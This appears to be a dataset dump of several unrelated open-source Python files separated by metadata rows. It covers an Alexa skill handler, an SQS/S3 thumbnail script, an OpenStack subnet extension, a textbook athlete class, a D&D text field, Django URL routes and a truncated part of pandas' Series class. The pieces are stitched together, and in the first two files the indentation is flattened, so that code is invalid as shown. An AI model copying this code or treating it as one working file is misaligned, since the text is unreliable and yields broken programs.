elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
"""
Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# --------------- Main handler ------------------
def lambda_handler(event, context):
"""
Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
if (event['session']['application']['applicationId'] != APPLICATION_ID):
raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'])
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
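

# --- Hedged local test harness (editor's addition, not part of the original skill) ---
# Builds the minimal event shape lambda_handler() actually reads. The IDs below
# are placeholders; APPLICATION_ID must match the 'applicationId' environment
# variable, and get_status() performs a real HTTP request to the status page.
if __name__ == "__main__":
    _test_event = {
        "session": {
            "new": True,
            "sessionId": "session-0000",
            "application": {"applicationId": APPLICATION_ID},
        },
        "request": {"type": "LaunchRequest", "requestId": "request-0000"},
    }
    print(json.dumps(lambda_handler(_test_event, None), indent=2))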
| mit | 2,951,908,603,387,607,000 | 33.441358 | 145 | 0.631419 | false |
jflitton/serverless-image-resizing | asynchronous.py | 1 | 2027 | import boto3
import cStringIO
import json
from config import Config
from PIL import Image
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
sqs = boto3.resource('sqs')
s3 = boto3.resource('s3')
bucket = s3.Bucket(Config.s3Bucket)
message_found = True
images_resized = 0
start_time = datetime.now()
# Get the queue's URL
queue = sqs.create_queue(QueueName=Config.queueName)
def get_messages():
return queue.receive_messages(MaxNumberOfMessages=10)
def delete_messages(messages):
return queue.delete_messages(
Entries=[{'Id': message.message_id, 'ReceiptHandle': message.receipt_handle} for message in messages]
)
def process(message):
original_file_name = json.loads(message.body)['Message']
# Download the input image from S3
input_file = cStringIO.StringIO()
bucket.download_fileobj(original_file_name, input_file)
image = Image.open(input_file)
# Resize to 150x100
image.thumbnail((150,100), Image.ANTIALIAS)
# Upload the resized image to S3
resized_file = cStringIO.StringIO()
image.save(resized_file, 'png')
bucket.put_object(
Key=original_file_name + '-150.png',
Body=resized_file.getvalue()
)
print "Processed {}".format(original_file_name)
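

# --- Hedged note (editor's addition) ---
# process() assumes each SQS message body is an SNS notification envelope whose
# 'Message' field holds the S3 key of the uploaded image, e.g. (illustrative only):
#   {"Type": "Notification", "Message": "uploads/photo-123.png", ...}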
messages = get_messages()
while len(messages):
print "Batch of {} started".format(len(messages))
with ThreadPoolExecutor(max_workers=len(messages)) as tpx:
tpx.map(
lambda message: process(message), messages
)
print "Batch done!"
images_resized += len(messages)
delete_messages(messages)
messages = get_messages()
# Output the performance results
end_time = datetime.now()
print "Start time: {}".format(start_time)
print "End time: {}".format(end_time)
duration_seconds = (end_time - start_time).total_seconds()
print "Run time: {} seconds".format(duration_seconds)
print "Messages processed: {}".format(images_resized)
print "Messages per second: {}".format(images_resized/duration_seconds)
| mit | 7,370,596,085,217,829,000 | 26.391892 | 109 | 0.706463 | false |
roaet/quark | quark/api/extensions/subnets_quark.py | 1 | 1760 | # Copyright (c) 2013 Rackspace Hosting Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.api import extensions
EXTENDED_ATTRIBUTES_2_0 = {
"subnets": {
"segment_id": {"allow_post": True, "allow_put": False,
"default": None},
"ip_policy_id": {"allow_post": False, "allow_put": False,
"default": None, "is_visible": True}
}
}
class Subnets_quark(extensions.ExtensionDescriptor):
"""Extends subnets for quark API purposes.
* Shunts enable_dhcp to false
"""
@classmethod
def get_name(cls):
return "Quark Subnets API Extension"
@classmethod
def get_alias(cls):
return "subnets_quark"
@classmethod
def get_description(cls):
return "Quark Subnets API Extension"
@classmethod
def get_namespace(cls):
return ("http://docs.openstack.org/api/openstack-network/2.0/content/"
"Subnets.html")
@classmethod
def get_updated(cls):
return "2013-04-22T10:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
| apache-2.0 | 6,089,075,658,689,884,000 | 28.830508 | 78 | 0.634659 | false |
byplacebo/head-first-python | 6th/class_coach2.py | 1 | 1120 | def sanitize(time_string):
if "-" in time_string:
splitter = "-"
elif ":" in time_string:
splitter = ":"
else:
return time_string
(mins, secs) = time_string.split(splitter)
return mins + "." + secs
class Athlete:
    def __init__(self, a_name, a_dob=None, a_times=None):
        self.name = a_name
        self.dob = a_dob
        # Use None as the default to avoid sharing one mutable list across instances
        self.times = a_times if a_times is not None else []
def top3(self):
return sorted(set(sanitize(t) for t in self.times))[0:3]
def add_time(self, time):
self.times.append(time)
def add_times(self, times):
self.times.extend(times)
def get_coach_data(filename):
try:
with open(filename) as f:
data = f.readline()
templ = data.strip().split(",")
return Athlete(templ.pop(0), templ.pop(0), templ)
except IOError as err:
print("File error : " + str(err))
return None
sarah = get_coach_data("sarah2.txt")
print(sarah.name + "'s fastest times are: " + str(sarah.top3()))
james = get_coach_data("james2.txt")
print(james.name + "'s fastest times are: " + str(james.top3()))
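
# --- Hedged example (editor's addition, not part of the original listing) ---
# Exercises add_time()/add_times(), which the class defines but the script
# above never calls; the athlete and times here are made up.
vera = Athlete("Vera", "2002-03-17")
vera.add_time("1.31")
vera.add_times(["2-22", "1:21", "2.01"])
print(vera.name + "'s fastest times are: " + str(vera.top3()))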
| apache-2.0 | -7,468,122,315,685,793,000 | 25.046512 | 64 | 0.570536 | false |
TheSchwa/dnd | char_sheet/fields/text.py | 1 | 1184 | from collections import OrderedDict
from dnd.char_sheet.fields import Field
###############################################################################
# Text class
# - supports newlines via the 2 literal characters '\n'
###############################################################################
class Text(Field):
FIELDS = OrderedDict([
('name',str),
('text',str),
])
# @param name (str)
# @param text (str)
def __init__(self,name,text):
self.name = name
self.set(text)
# @param text (str)
def set(self,text):
# we store newlines internally as '\' + 'n' for ease of saving
text = text or ''
self.text = text.strip().replace('\n','\\n')
# @return (str) truncated to 50 characters and replacing newlines with '|'
def __str__(self):
text = '[BLANK]' if not self.text else self.text.replace('\\n',' | ')
ellip = ''
if len(text)>50:
(text,ellip) = (text[:50],'...')
return '%s: %s%s' % (self.name,text,ellip)
# @return (str) full text with real newlines
def str_all(self):
text = '[BLANK]' if not self.text else self.text
return '--- %s\n%s' % (self.name,text.replace('\\n','\n'))
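

# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Exercises the newline round-trip described above; nothing runs at import time.
def _example_text_roundtrip():
    note = Text('Backstory', 'Raised in Waterdeep.\nHates goblins.')
    # str() truncates and shows stored newlines as ' | ', str_all() restores real newlines
    return (str(note), note.str_all())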
| gpl-3.0 | 4,237,716,498,768,581,600 | 25.909091 | 79 | 0.511824 | false |
arteria/django-copywriting | copywriting/urls.py | 1 | 1053 | from compat import patterns, url
urlpatterns = patterns('copywriting',
url(r'^author/(?P<author>\w[^/]+)$', 'views.listArticlesByAuthor'),
url(r'^author/(?P<author>\w[^/]+)/$', 'views.listArticlesByAuthor', name='copywriting_by_author'),
url(r'^tag/(?P<in_tag>\w[^/]+)$', 'views.withTag'),
url(r'^tag/(?P<in_tag>\w[^/]+)/$', 'views.withTag', name='copywriting_by_tag'),
# (r'^(?P<year>\d+)/(?P<month>\d+)/(?P<day>\d+)/$', 'views.listBlogEntriesByYearMonthDay'),
url(r'^(?P<requestYear>\d+)/(?P<requestMonth>\d+)/$', 'views.listArticlesByYearMonth', name='copywriting_by_month'),
url(r'^(?P<requestYear>\d+)/$', 'views.listArticlesByYear', name='copywriting_by_year'),
url(r'^(?P<slug>[^\.]+)/$', 'views.showArticle', name='copywriting_article'),
url('^$', 'views.listArticles', name='copywriting_index'),
)
try:
from .feed import blogFeed
urlpatterns += patterns('copywriting',
url(r'^feed\.rss$', blogFeed()),
url(r'^feed/$', blogFeed()),
)
except Exception, ex:
print ex
pass
| mit | 4,051,932,310,077,401,000 | 42.875 | 120 | 0.605888 | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/core/series.py | 1 | 150775 | """
Data structure for 1-dimensional cross-sectional and time series data
"""
from collections import OrderedDict
from io import StringIO
from shutil import get_terminal_size
from textwrap import dedent
from typing import Any, Callable
import warnings
import numpy as np
from pandas._config import get_option
from pandas._libs import iNaT, index as libindex, lib, reshape, tslibs
from pandas.compat import PY36
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender, Substitution, deprecate
from pandas.util._validators import validate_bool_kwarg
from pandas.core.dtypes.common import (
_is_unorderable_exception,
ensure_platform_int,
is_bool,
is_categorical,
is_categorical_dtype,
is_datetime64_dtype,
is_datetimelike,
is_dict_like,
is_extension_array_dtype,
is_extension_type,
is_hashable,
is_integer,
is_iterator,
is_list_like,
is_object_dtype,
is_scalar,
is_string_like,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeArray,
ABCDatetimeIndex,
ABCSeries,
ABCSparseArray,
ABCSparseSeries,
)
from pandas.core.dtypes.missing import (
is_valid_nat_for_dtype,
isna,
na_value_for_dtype,
notna,
remove_na_arraylike,
)
import pandas as pd
from pandas.core import algorithms, base, generic, nanops, ops
from pandas.core.accessor import CachedAccessor, DirNamesMixin
from pandas.core.arrays import ExtensionArray, SparseArray
from pandas.core.arrays.categorical import Categorical, CategoricalAccessor
from pandas.core.arrays.sparse import SparseAccessor
import pandas.core.common as com
from pandas.core.index import (
Float64Index,
Index,
InvalidIndexError,
MultiIndex,
ensure_index,
)
from pandas.core.indexers import maybe_convert_indices
from pandas.core.indexes.accessors import CombinedDatetimelikeProperties
import pandas.core.indexes.base as ibase
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import PeriodIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
from pandas.core.indexing import check_bool_indexer
from pandas.core.internals import SingleBlockManager
from pandas.core.internals.construction import sanitize_array
from pandas.core.strings import StringMethods
from pandas.core.tools.datetimes import to_datetime
import pandas.io.formats.format as fmt
import pandas.plotting
__all__ = ["Series"]
_shared_doc_kwargs = dict(
axes="index",
klass="Series",
axes_single_arg="{0 or 'index'}",
axis="""axis : {0 or 'index'}
Parameter needed for compatibility with DataFrame.""",
inplace="""inplace : boolean, default False
If True, performs operation inplace and returns None.""",
unique="np.ndarray",
duplicated="Series",
optional_by="",
optional_mapper="",
optional_labels="",
optional_axis="",
versionadded_to_excel="\n .. versionadded:: 0.20.0\n",
)
# see gh-16971
def remove_na(arr):
"""
Remove null values from array like structure.
.. deprecated:: 0.21.0
Use s[s.notnull()] instead.
"""
warnings.warn(
"remove_na is deprecated and is a private " "function. Do not use.",
FutureWarning,
stacklevel=2,
)
return remove_na_arraylike(arr)
def _coerce_method(converter):
"""
Install the scalar coercion methods.
"""
def wrapper(self):
if len(self) == 1:
return converter(self.iloc[0])
raise TypeError("cannot convert the series to " "{0}".format(str(converter)))
wrapper.__name__ = "__{name}__".format(name=converter.__name__)
return wrapper
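
# Illustration (editor's addition, shown as comments only so nothing executes at
# import time): the generated __float__/__int__ methods only succeed for
# length-1 Series, e.g.
#   >>> float(pd.Series([1.5]))
#   1.5
#   >>> float(pd.Series([1.5, 2.5]))
#   TypeError: cannot convert the series to <class 'float'>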
# ----------------------------------------------------------------------
# Series class
class Series(base.IndexOpsMixin, generic.NDFrame):
"""
One-dimensional ndarray with axis labels (including time series).
Labels need not be unique but must be a hashable type. The object
supports both integer- and label-based indexing and provides a host of
methods for performing operations involving the index. Statistical
methods from ndarray have been overridden to automatically exclude
missing data (currently represented as NaN).
Operations between Series (+, -, /, *, **) align values based on their
associated index values-- they need not be the same length. The result
index will be the sorted union of the two indexes.
Parameters
----------
data : array-like, Iterable, dict, or scalar value
Contains data stored in Series.
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : array-like or Index (1d)
Values must be hashable and have the same length as `data`.
Non-unique index values are allowed. Will default to
RangeIndex (0, 1, 2, ..., n) if not provided. If both a dict and index
sequence are used, the index will override the keys found in the
dict.
dtype : str, numpy.dtype, or ExtensionDtype, optional
Data type for the output Series. If not specified, this will be
inferred from `data`.
See the :ref:`user guide <basics.dtypes>` for more usages.
copy : bool, default False
Copy input data.
"""
_metadata = ["name"]
_accessors = {"dt", "cat", "str", "sparse"}
# tolist is not actually deprecated, just suppressed in the __dir__
_deprecations = (
generic.NDFrame._deprecations
| DirNamesMixin._deprecations
| frozenset(["asobject", "reshape", "get_value", "set_value", "valid"])
| frozenset(["ftype", "real", "imag", "tolist"])
)
# Override cache_readonly bc Series is mutable
hasnans = property(
base.IndexOpsMixin.hasnans.func, doc=base.IndexOpsMixin.hasnans.__doc__
)
_data = None # type: SingleBlockManager
# ----------------------------------------------------------------------
# Constructors
def __init__(
self, data=None, index=None, dtype=None, name=None, copy=False, fastpath=False
):
# we are called internally, so short-circuit
if fastpath:
# data is an ndarray, index is defined
if not isinstance(data, SingleBlockManager):
data = SingleBlockManager(data, index, fastpath=True)
if copy:
data = data.copy()
if index is None:
index = data.index
else:
if index is not None:
index = ensure_index(index)
if data is None:
data = {}
if dtype is not None:
# GH 26336: explicitly handle 'category' to avoid warning
# TODO: Remove after CategoricalDtype defaults to ordered=False
if (
isinstance(dtype, str)
and dtype == "category"
and is_categorical(data)
):
dtype = data.dtype
dtype = self._validate_dtype(dtype)
if isinstance(data, MultiIndex):
raise NotImplementedError(
"initializing a Series from a " "MultiIndex is not supported"
)
elif isinstance(data, Index):
if name is None:
name = data.name
if dtype is not None:
# astype copies
data = data.astype(dtype)
else:
# need to copy to avoid aliasing issues
data = data._values.copy()
if isinstance(data, ABCDatetimeIndex) and data.tz is not None:
# GH#24096 need copy to be deep for datetime64tz case
# TODO: See if we can avoid these copies
data = data._values.copy(deep=True)
copy = False
elif isinstance(data, np.ndarray):
pass
elif isinstance(data, (ABCSeries, ABCSparseSeries)):
if name is None:
name = data.name
if index is None:
index = data.index
else:
data = data.reindex(index, copy=copy)
data = data._data
elif isinstance(data, dict):
data, index = self._init_dict(data, index, dtype)
dtype = None
copy = False
elif isinstance(data, SingleBlockManager):
if index is None:
index = data.index
elif not data.index.equals(index) or copy:
# GH#19275 SingleBlockManager input should only be called
# internally
raise AssertionError(
"Cannot pass both SingleBlockManager "
"`data` argument and a different "
"`index` argument. `copy` must "
"be False."
)
elif is_extension_array_dtype(data):
pass
elif isinstance(data, (set, frozenset)):
raise TypeError(
"{0!r} type is unordered" "".format(data.__class__.__name__)
)
elif isinstance(data, ABCSparseArray):
# handle sparse passed here (and force conversion)
data = data.to_dense()
else:
data = com.maybe_iterable_to_list(data)
if index is None:
if not is_list_like(data):
data = [data]
index = ibase.default_index(len(data))
elif is_list_like(data):
# a scalar numpy array is list-like but doesn't
# have a proper length
try:
if len(index) != len(data):
raise ValueError(
"Length of passed values is {val}, "
"index implies {ind}".format(val=len(data), ind=len(index))
)
except TypeError:
pass
# create/copy the manager
if isinstance(data, SingleBlockManager):
if dtype is not None:
data = data.astype(dtype=dtype, errors="ignore", copy=copy)
elif copy:
data = data.copy()
else:
data = sanitize_array(data, index, dtype, copy, raise_cast_failure=True)
data = SingleBlockManager(data, index, fastpath=True)
generic.NDFrame.__init__(self, data, fastpath=True)
self.name = name
self._set_axis(0, index, fastpath=True)
def _init_dict(self, data, index=None, dtype=None):
"""
Derive the "_data" and "index" attributes of a new Series from a
dictionary input.
Parameters
----------
data : dict or dict-like
Data used to populate the new Series
index : Index or index-like, default None
index for the new Series: if None, use dict keys
dtype : dtype, default None
dtype for the new Series: if None, infer from data
Returns
-------
_data : BlockManager for the new Series
index : index for the new Series
"""
# Looking for NaN in dict doesn't work ({np.nan : 1}[float('nan')]
# raises KeyError), so we iterate the entire dict, and align
if data:
keys, values = zip(*data.items())
values = list(values)
elif index is not None:
# fastpath for Series(data=None). Just use broadcasting a scalar
# instead of reindexing.
values = na_value_for_dtype(dtype)
keys = index
else:
keys, values = [], []
# Input is now list-like, so rely on "standard" construction:
s = Series(values, index=keys, dtype=dtype)
# Now we just make sure the order is respected, if any
if data and index is not None:
s = s.reindex(index, copy=False)
elif not PY36 and not isinstance(data, OrderedDict) and data:
# Need the `and data` to avoid sorting Series(None, index=[...])
# since that isn't really dict-like
try:
s = s.sort_index()
except TypeError:
pass
return s._data, s.index
@classmethod
def from_array(
cls, arr, index=None, name=None, dtype=None, copy=False, fastpath=False
):
"""
Construct Series from array.
.. deprecated :: 0.23.0
Use pd.Series(..) constructor instead.
Returns
-------
Series
Constructed Series.
"""
warnings.warn(
"'from_array' is deprecated and will be removed in a "
"future version. Please use the pd.Series(..) "
"constructor instead.",
FutureWarning,
stacklevel=2,
)
if isinstance(arr, ABCSparseArray):
from pandas.core.sparse.series import SparseSeries
cls = SparseSeries
return cls(
arr, index=index, name=name, dtype=dtype, copy=copy, fastpath=fastpath
)
# ----------------------------------------------------------------------
@property
def _constructor(self):
return Series
@property
def _constructor_expanddim(self):
from pandas.core.frame import DataFrame
return DataFrame
# types
@property
def _can_hold_na(self):
return self._data._can_hold_na
_index = None
def _set_axis(self, axis, labels, fastpath=False):
"""
Override generic, we want to set the _typ here.
"""
if not fastpath:
labels = ensure_index(labels)
is_all_dates = labels.is_all_dates
if is_all_dates:
if not isinstance(labels, (DatetimeIndex, PeriodIndex, TimedeltaIndex)):
try:
labels = DatetimeIndex(labels)
# need to set here because we changed the index
if fastpath:
self._data.set_axis(axis, labels)
except (tslibs.OutOfBoundsDatetime, ValueError):
# labels may exceeds datetime bounds,
# or not be a DatetimeIndex
pass
self._set_subtyp(is_all_dates)
object.__setattr__(self, "_index", labels)
if not fastpath:
self._data.set_axis(axis, labels)
def _set_subtyp(self, is_all_dates):
if is_all_dates:
object.__setattr__(self, "_subtyp", "time_series")
else:
object.__setattr__(self, "_subtyp", "series")
def _update_inplace(self, result, **kwargs):
# we want to call the generic version and not the IndexOpsMixin
return generic.NDFrame._update_inplace(self, result, **kwargs)
@property
def name(self):
"""
Return name of the Series.
"""
return self._name
@name.setter
def name(self, value):
if value is not None and not is_hashable(value):
raise TypeError("Series.name must be a hashable type")
object.__setattr__(self, "_name", value)
# ndarray compatibility
@property
def dtype(self):
"""
Return the dtype object of the underlying data.
"""
return self._data.dtype
@property
def dtypes(self):
"""
Return the dtype object of the underlying data.
"""
return self._data.dtype
@property
def ftype(self):
"""
Return if the data is sparse|dense.
.. deprecated:: 0.25.0
Use :func:`dtype` instead.
"""
warnings.warn(
"Series.ftype is deprecated and will "
"be removed in a future version. "
"Use Series.dtype instead.",
FutureWarning,
stacklevel=2,
)
return self._data.ftype
@property
def ftypes(self):
"""
Return if the data is sparse|dense.
.. deprecated:: 0.25.0
Use :func:`dtypes` instead.
"""
        warnings.warn(
            "Series.ftypes is deprecated and will "
            "be removed in a future version. "
            "Use Series.dtypes instead.",
            FutureWarning,
            stacklevel=2,
        )
return self._data.ftype
@property
def values(self):
"""
Return Series as ndarray or ndarray-like depending on the dtype.
.. warning::
We recommend using :attr:`Series.array` or
:meth:`Series.to_numpy`, depending on whether you need
a reference to the underlying data or a NumPy array.
Returns
-------
numpy.ndarray or ndarray-like
See Also
--------
Series.array : Reference to the underlying data.
Series.to_numpy : A NumPy array representing the underlying data.
Examples
--------
>>> pd.Series([1, 2, 3]).values
array([1, 2, 3])
>>> pd.Series(list('aabc')).values
array(['a', 'a', 'b', 'c'], dtype=object)
>>> pd.Series(list('aabc')).astype('category').values
[a, a, b, c]
Categories (3, object): [a, b, c]
Timezone aware datetime data is converted to UTC:
>>> pd.Series(pd.date_range('20130101', periods=3,
... tz='US/Eastern')).values
array(['2013-01-01T05:00:00.000000000',
'2013-01-02T05:00:00.000000000',
'2013-01-03T05:00:00.000000000'], dtype='datetime64[ns]')
"""
return self._data.external_values()
@property
def _values(self):
"""
Return the internal repr of this data.
"""
return self._data.internal_values()
def _formatting_values(self):
"""
Return the values that can be formatted (used by SeriesFormatter
and DataFrameFormatter).
"""
return self._data.formatting_values()
def get_values(self):
"""
Same as values (but handles sparseness conversions); is a view.
.. deprecated:: 0.25.0
Use :meth:`Series.to_numpy` or :attr:`Series.array` instead.
Returns
-------
numpy.ndarray
Data of the Series.
"""
warnings.warn(
"The 'get_values' method is deprecated and will be removed in a "
"future version. Use '.to_numpy()' or '.array' instead.",
FutureWarning,
stacklevel=2,
)
return self._internal_get_values()
def _internal_get_values(self):
return self._data.get_values()
@property
def asobject(self):
"""
Return object Series which contains boxed values.
.. deprecated :: 0.23.0
Use ``astype(object)`` instead.
*this is an internal non-public method*
"""
warnings.warn(
"'asobject' is deprecated. Use 'astype(object)'" " instead",
FutureWarning,
stacklevel=2,
)
return self.astype(object).values
# ops
def ravel(self, order="C"):
"""
Return the flattened underlying data as an ndarray.
Returns
-------
numpy.ndarray or ndarray-like
Flattened data of the Series.
See Also
--------
numpy.ndarray.ravel
"""
return self._values.ravel(order=order)
def compress(self, condition, *args, **kwargs):
"""
Return selected slices of an array along given axis as a Series.
.. deprecated:: 0.24.0
Returns
-------
Series
Series without the slices for which condition is false.
See Also
--------
numpy.ndarray.compress
"""
msg = (
"Series.compress(condition) is deprecated. "
"Use 'Series[condition]' or "
"'np.asarray(series).compress(condition)' instead."
)
warnings.warn(msg, FutureWarning, stacklevel=2)
nv.validate_compress(args, kwargs)
return self[condition]
def nonzero(self):
"""
Return the *integer* indices of the elements that are non-zero.
.. deprecated:: 0.24.0
Please use .to_numpy().nonzero() as a replacement.
This method is equivalent to calling `numpy.nonzero` on the
series data. For compatibility with NumPy, the return value is
the same (a tuple with an array of indices for each dimension),
but it will always be a one-item tuple because series only have
one dimension.
Returns
-------
numpy.ndarray
Indices of elements that are non-zero.
See Also
--------
numpy.nonzero
Examples
--------
>>> s = pd.Series([0, 3, 0, 4])
>>> s.nonzero()
(array([1, 3]),)
>>> s.iloc[s.nonzero()[0]]
1 3
3 4
dtype: int64
>>> s = pd.Series([0, 3, 0, 4], index=['a', 'b', 'c', 'd'])
# same return although index of s is different
>>> s.nonzero()
(array([1, 3]),)
>>> s.iloc[s.nonzero()[0]]
b 3
d 4
dtype: int64
"""
msg = (
"Series.nonzero() is deprecated "
"and will be removed in a future version."
"Use Series.to_numpy().nonzero() instead"
)
warnings.warn(msg, FutureWarning, stacklevel=2)
return self._values.nonzero()
def put(self, *args, **kwargs):
"""
Apply the `put` method to its `values` attribute if it has one.
.. deprecated:: 0.25.0
See Also
--------
numpy.ndarray.put
"""
        warnings.warn(
            "`put` has been deprecated and will be removed in a "
            "future version.",
            FutureWarning,
            stacklevel=2,
        )
self._values.put(*args, **kwargs)
def __len__(self):
"""
Return the length of the Series.
"""
return len(self._data)
def view(self, dtype=None):
"""
Create a new view of the Series.
This function will return a new Series with a view of the same
underlying values in memory, optionally reinterpreted with a new data
type. The new data type must preserve the same size in bytes as to not
cause index misalignment.
Parameters
----------
dtype : data type
Data type object or one of their string representations.
Returns
-------
Series
A new Series object as a view of the same data in memory.
See Also
--------
numpy.ndarray.view : Equivalent numpy function to create a new view of
the same data in memory.
Notes
-----
Series are instantiated with ``dtype=float64`` by default. While
``numpy.ndarray.view()`` will return a view with the same data type as
the original array, ``Series.view()`` (without specified dtype)
will try using ``float64`` and may fail if the original data type size
in bytes is not the same.
Examples
--------
>>> s = pd.Series([-2, -1, 0, 1, 2], dtype='int8')
>>> s
0 -2
1 -1
2 0
3 1
4 2
dtype: int8
The 8 bit signed integer representation of `-1` is `0b11111111`, but
the same bytes represent 255 if read as an 8 bit unsigned integer:
>>> us = s.view('uint8')
>>> us
0 254
1 255
2 0
3 1
4 2
dtype: uint8
The views share the same underlying values:
>>> us[0] = 128
>>> s
0 -128
1 -1
2 0
3 1
4 2
dtype: int8
"""
return self._constructor(
self._values.view(dtype), index=self.index
).__finalize__(self)
# ----------------------------------------------------------------------
# NDArray Compat
_HANDLED_TYPES = (Index, ExtensionArray, np.ndarray)
def __array_ufunc__(
self, ufunc: Callable, method: str, *inputs: Any, **kwargs: Any
):
# TODO: handle DataFrame
from pandas.core.internals.construction import extract_array
cls = type(self)
# for binary ops, use our custom dunder methods
result = ops.maybe_dispatch_ufunc_to_dunder_op(
self, ufunc, method, *inputs, **kwargs
)
if result is not NotImplemented:
return result
# Determine if we should defer.
no_defer = (np.ndarray.__array_ufunc__, cls.__array_ufunc__)
for item in inputs:
higher_priority = (
hasattr(item, "__array_priority__")
and item.__array_priority__ > self.__array_priority__
)
has_array_ufunc = (
hasattr(item, "__array_ufunc__")
and type(item).__array_ufunc__ not in no_defer
and not isinstance(item, self._HANDLED_TYPES)
)
if higher_priority or has_array_ufunc:
return NotImplemented
# align all the inputs.
names = [getattr(x, "name") for x in inputs if hasattr(x, "name")]
types = tuple(type(x) for x in inputs)
# TODO: dataframe
alignable = [x for x, t in zip(inputs, types) if issubclass(t, Series)]
if len(alignable) > 1:
# This triggers alignment.
# At the moment, there aren't any ufuncs with more than two inputs
# so this ends up just being x1.index | x2.index, but we write
# it to handle *args.
index = alignable[0].index
for s in alignable[1:]:
index |= s.index
inputs = tuple(
x.reindex(index) if issubclass(t, Series) else x
for x, t in zip(inputs, types)
)
else:
index = self.index
inputs = tuple(extract_array(x, extract_numpy=True) for x in inputs)
result = getattr(ufunc, method)(*inputs, **kwargs)
if len(set(names)) == 1:
# we require names to be hashable, right?
name = names[0] # type: Any
else:
name = None
def construct_return(result):
if lib.is_scalar(result):
return result
elif result.ndim > 1:
# e.g. np.subtract.outer
if method == "outer":
msg = (
"outer method for ufunc {} is not implemented on "
"pandas objects. Returning an ndarray, but in the "
"future this will raise a 'NotImplementedError'. "
"Consider explicitly converting the Series "
"to an array with '.array' first."
)
warnings.warn(msg.format(ufunc), FutureWarning, stacklevel=3)
return result
return self._constructor(result, index=index, name=name, copy=False)
if type(result) is tuple:
# multiple return values
return tuple(construct_return(x) for x in result)
elif method == "at":
# no return value
return None
else:
return construct_return(result)
def __array__(self, dtype=None):
"""
Return the values as a NumPy array.
Users should not call this directly. Rather, it is invoked by
:func:`numpy.array` and :func:`numpy.asarray`.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to use for the resulting NumPy array. By default,
the dtype is inferred from the data.
Returns
-------
numpy.ndarray
            The values in the series converted to a :class:`numpy.ndarray`
with the specified `dtype`.
See Also
--------
array : Create a new array from data.
Series.array : Zero-copy view to the array backing the Series.
Series.to_numpy : Series method for similar behavior.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> np.asarray(ser)
array([1, 2, 3])
For timezone-aware data, the timezones may be retained with
``dtype='object'``
>>> tzser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> np.asarray(tzser, dtype="object")
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET', freq='D'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET', freq='D')],
dtype=object)
        Or the values may be localized to UTC and the tzinfo discarded with
``dtype='datetime64[ns]'``
>>> np.asarray(tzser, dtype="datetime64[ns]") # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', ...],
dtype='datetime64[ns]')
"""
if (
dtype is None
and isinstance(self.array, ABCDatetimeArray)
and getattr(self.dtype, "tz", None)
):
msg = (
"Converting timezone-aware DatetimeArray to timezone-naive "
"ndarray with 'datetime64[ns]' dtype. In the future, this "
"will return an ndarray with 'object' dtype where each "
"element is a 'pandas.Timestamp' with the correct 'tz'.\n\t"
"To accept the future behavior, pass 'dtype=object'.\n\t"
"To keep the old behavior, pass 'dtype=\"datetime64[ns]\"'."
)
warnings.warn(msg, FutureWarning, stacklevel=3)
dtype = "M8[ns]"
return np.asarray(self.array, dtype)
# ----------------------------------------------------------------------
# Unary Methods
@property
def real(self):
"""
Return the real value of vector.
        .. deprecated:: 0.25.0
"""
warnings.warn(
"`real` is deprecated and will be removed in a future version. "
"To eliminate this warning for a Series `ser`, use "
"`np.real(ser.to_numpy())` or `ser.to_numpy().real`.",
FutureWarning,
stacklevel=2,
)
return self.values.real
@real.setter
def real(self, v):
self.values.real = v
@property
def imag(self):
"""
Return imag value of vector.
        .. deprecated:: 0.25.0
"""
warnings.warn(
"`imag` is deprecated and will be removed in a future version. "
"To eliminate this warning for a Series `ser`, use "
"`np.imag(ser.to_numpy())` or `ser.to_numpy().imag`.",
FutureWarning,
stacklevel=2,
)
return self.values.imag
@imag.setter
def imag(self, v):
self.values.imag = v
# coercion
__float__ = _coerce_method(float)
__long__ = _coerce_method(int)
__int__ = _coerce_method(int)
# ----------------------------------------------------------------------
def _unpickle_series_compat(self, state):
if isinstance(state, dict):
self._data = state["_data"]
self.name = state["name"]
self.index = self._data.index
elif isinstance(state, tuple):
# < 0.12 series pickle
nd_state, own_state = state
# recreate the ndarray
data = np.empty(nd_state[1], dtype=nd_state[2])
np.ndarray.__setstate__(data, nd_state)
# backwards compat
index, name = own_state[0], None
if len(own_state) > 1:
name = own_state[1]
# recreate
self._data = SingleBlockManager(data, index, fastpath=True)
self._index = index
self.name = name
else:
raise Exception("cannot unpickle legacy formats -> [%s]" % state)
# indexers
@property
def axes(self):
"""
Return a list of the row axis labels.
"""
return [self.index]
